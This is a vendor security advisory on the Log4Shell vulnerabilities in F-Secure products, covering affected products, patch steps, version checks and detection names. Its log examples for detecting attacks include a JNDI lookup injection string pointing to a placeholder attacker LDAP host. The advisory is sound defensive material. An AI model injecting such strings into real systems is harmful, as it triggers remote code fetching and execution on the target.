Note: This article will be updated as more information becomes available. We recommend you check back from time to time.
Update 2021-12-22: F-Secure Policy Manager 15.30 has been released, which includes a revised Java Runtime Environment which addresses these issues without the need to patch. Customers are advised to take this into use at their earliest opportunity.
Background
During the early hours of 2021-12-10 (UTC+0), a vulnerability (CVE-2021-44228) was announced in the widely used Log4J library. This library is used by many software vendors and service providers globally as a standardized way of handling log messages within software.
Like many other organizations, F-Secure immediately began to investigate which of our services and products might be affected.
Additionally, on 2021-12-14 (UTC+0), a further vulnerability (CVE-2021-45046) was announced in the same library. Naturally, we are investigating this vulnerability too. We will update this page with more information as it becomes available
What is the impact of the vulnerability
The vulnerability allows an attacker to cause the target system to fetch and execute code from a remote location controlled by the attacker. The second stage - what the downloaded malicious code does next - is fully up to the attacker.
What F-Secure products are affected
We have identified that only the following F-Secure products are affected by vulnerability CVE-2021-44228:
- F-Secure Policy Manager
- Note: Only the Policy Manager Server component is affected. Standalone installations of Policy Manager Console are not affected.
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- F-Secure Elements Connector
- F-Secure Messaging Security Gateway
Other F-Secure products are NOT affected
Please read on to see what steps are needed to address these issues.
How to check my F-Secure Elements Connector
Update: Elements Connector has now been updated via the channel to a fixed version, and there is no need to manually apply the patch.
To check if you have the latest version, please check the following
Linux/RPM:
Execute Command: rpm -qa f-secure-elements-connector
This will return something similar to : f-secure-elements-connector-21.49.96235-1.x86_64
Linux/DEB:
Execute Command: dpkg -l f-secure-elements-connector (use lower case L)
This will return something similar to : ii f-secure-elements-connector 21.49.96235
Windows:
Check the version in Windows "Apps and Features"
In all cases, if the version reported is 21.49.96235 or greater, you have the fixed version
How to patch my F-Secure Policy Manager / Policy Manager Proxy / Endpoint Proxy
Both Windows and Linux versions of these products should be considered affected.
Update: These products are not vulnerable to CVE-2021-45046, but must still be patched for CVE-2021-44228
Instructions are common for all the above products.
Note: the patch needs to be (re-)applied after new installation or upgrade, until we get fixed installers available.We have created a deployable security patch for this vulnerability. Please follow the following steps to patch your installations:
Note: The paths given below are suitable for an installation to the standard location. If you have chosen a custom path during installation, these will need to be adjusted accordingly.
- Download the patch from the F-Secure server
- The SHA256 hash of the file should be checked to verify its integrity. It should be 64f7e4e1c6617447a24b0fe44ec7b4776883960cc42cc86be68c613d23ccd5e0
- Stop the Policy Manager Server service
- Windows: net stop fsms
- Linux: Service name is fspms, the actual command to stop the service may vary with the operating system version. Refer to release notes.
- Copy the downloaded file to the correct location:
- For Windows the exact location depends on the product installed:
- Policy Manager, Policy Manager Proxy or F-Secure Endpoint Proxy
- C:\Program Files (x86)\F-Secure\Management Server 5\lib\
- Note: this is the only location where the patch is needed
- For Linux the location is simpler, as all affected products use the same:
- Note: this is the only location where the patch is needed
- /opt/f-secure/fspms/lib
- Start the Policy Manager Server service
- Linux: Service name is fspms, the actual command to start the service may vary with the operating system version. Refer to release notes.
- Windows: net start fsms
As the service starts, the patch will be automatically taken into use.
Note: This patch applies to all versions of the affected software from 13.10 onwards. Customers using earlier versions than this MUST upgrade to the latest supported version, as their version is incompatible with the patch and versions below 14 are out of support.
Update: We have created an easy to use tool that can be used to verify if the patches have been applied: You can find it here.
How to patch my F-Secure Messaging Security Gateway
In most cases, F-Secure has automatically patched the Messaging Security Gateway installations.
However, some customers may have set the system so that they apply the patches manually. In this case the administrator will receive an email informing them of the patch availability, and they should immediately apply the patches.
The following patches have been released by F-Secure to address these vulnerabilities:
- 4312 8.17 Log4j (log4Shell) CVE-2021-44228 security fix
- 4311 8.15 Log4j (log4Shell) CVE-2021-44228 security fix
- 4310 8.16 Log4j (log4Shell) CVE-2021-44228 security fix
- 4309 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4308 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4307 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4303 8.12 Log4j (log4Shell) CVE-2021-44228 security fix
- 4302 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4301 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4300 8.15 Log4j (log4Shell) CVE-2021-44228 security fix
- 4299 8.14 Log4j (log4Shell) CVE-2021-44228 security fix
- 4298 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4295 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4294 8.17 Log4j (log4Shell) CVE-2021-44228 security fix
- 4293 8.16 Log4j (log4Shell) CVE-2021-44228 security fix
- 4291 8.18 Log4j (log4Shell) CVE-2021-44228 security fix
- 4290 8.18 Log4j (log4Shell) CVE-2021-44228 security fix
- 4257 8.18 CVE-2021-40438 Apache security fix
- 4256 8.17 CVE-2021-40438 Apache security fix
- 4255 8.16 CVE-2021-40438 Apache security fix
- 4254 8.13 CVE-2021-40438 Apache security fix
- 4335 8.15.00 Log4j (log4Shell) CVE-2021-45046 security fix
- 4334 8.16.02 Log4j (log4Shell) CVE-2021-45046 security fix
- 4333 8.12.04 Log4j (log4Shell) CVE-2021-45046 security fix
- 4332 8.13.10 Log4j (log4Shell) CVE-2021-45046 security fix
- 4331 8.13.06 Log4j (log4Shell) CVE-2021-45046 security fix
- 4330 8.15.02 Log4j (log4Shell) CVE-2021-45046 security fix
- 4329 8.14.02 Log4j (log4Shell) CVE-2021-45046 security fix
- 4328 8.13.14 Log4j (log4Shell) CVE-2021-45046 security fix
- 4327 8.13.08 Log4j (log4Shell) CVE-2021-45046 security fix
- 4326 8.13.20 Log4j (log4Shell) CVE-2021-45046 security fix
- 4325 8.13.18 Log4j (log4Shell) CVE-2021-45046 security fix
- 4324 8.17.04 Log4j (log4Shell) CVE-2021-45046 security fix
- 4323 8.16.04 Log4j (log4Shell) CVE-2021-45046 security fix
- 4322 8.13.22 Log4j (log4Shell) CVE-2021-45046 security fix
- 4321 8.18.02 Log4j (log4Shell) CVE-2021-45046 security fix
- 4320 8.18.00 Log4j (log4Shell) CVE-2021-45046 security fix
- 4313 8.13.14 Log4j (log4Shell) CVE-2021-44228 security fix
- 4336 8.17.02 Log4j (log4Shell) CVE-2021-45046 security fix
How to check if my F-Secure product has been attacked
Logfiles may help in detecting an attack. Please be aware these are only examples and different entries may be relevant instead. The log files are rotated after they reach 15 megabytes, and 50 such rotated logs are kept.
The relevant parts in the examples below are the parts related to "jndi" and "ldap".
Example from fspms-log4j-internal.log (Default: C:\Program Files (x86)\F-Secure\Management Server 5\logs\fspms-log4j-internal.log):
11.12.2021 09:43:23,525 INFO [log4jInternalLog] - [WARN] Error looking up JNDI resource [ldap://xxx.xxx.xxx.xxx:xxxx/abc].
11.12.2021 09:43:23,525 ERROR [log4jInternalLog] - log4j error
javax.naming.NamingException: LDAP connection has been closed
Example from request.log (Default: C:\Program Files (x86)\F-Secure\Management Server 5\logs\request.log):
0:0:0:0:0:0:0:1 - - [11/Dec/2021:07:49:38 +0100] "GET / HTTP/1.1" 200 1995 "-" "${jndi:ldap://xxx.xxx.xxx.xxx:xxxx/abc}" 0 "-" 3090 "-" "DONE"
It is not possible to give a wide range of examples, as new variants of the exploit are constantly being created and they will cause log messages which differ from above examples.
The initial exploit attempts may also have been obfuscated. Some basic obfuscations can be bypassed with a clever regular expression. An example collection of useful searches can be found at https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b .
The second stage of the attack is fully dependent on what code is fetched from the remote location by the initial log4j exploit, and no good indicators of compromise can be singled out for them.
The attack may also leak environment variables from the targeted system. If the exploit URL contains the name of such a variable, log4j resolves the value and places it into the outgoing URL.
Note: After patching, jndi will still appear in the request.log, as this particular log records all incoming requests. This is by design, as it is important the Administrator can see all the incoming requests.
What protection does F-Secure provide against this vulnerability
Our Endpoint Protection (EPP) is continuously updated with detections for the latest local exploit files, but given the many ways in which exploitation can happen, this only covers part of the problem.
EPP detections will address any payload seen in post-exploitation phase as usual, and at this point in time, we have the following detections in place that address some serious attack scenarios. These represents malicious payloads that we have seen ”in the wild” in connection with Log4j exploits.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Many of these detections have been in available in our EPP for months already, meaning that our customers are proactively protected from this kind of payloads.
Other detections present may also help, as there are multiple ways to use the exploit. We will update the list of useful detections as the situation evolves.
Our Endpoint Detection and Response (EDR) capabilities are effective independently from this specific vulnerability and malicious activities, particularly those related to post-exploitation, will be detected as normal. We will keep adding new detections on the basis of what we see.
F-Secure Elements Vulnerability Management is being constantly updated to add detections, and we have a separate page detailing the current status. This will be updated as new detections are available.
Please also check the recommendations below in the following section.
What steps should you take in general (applies to all software, regardless of vendor)
Further Reading
Our F-Secure Consulting Incident Response team has also created a post with some additional information on the vulnerability.
Other useful links
SwitHak has created a useful page that collates various articles related to this vulnerability: https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592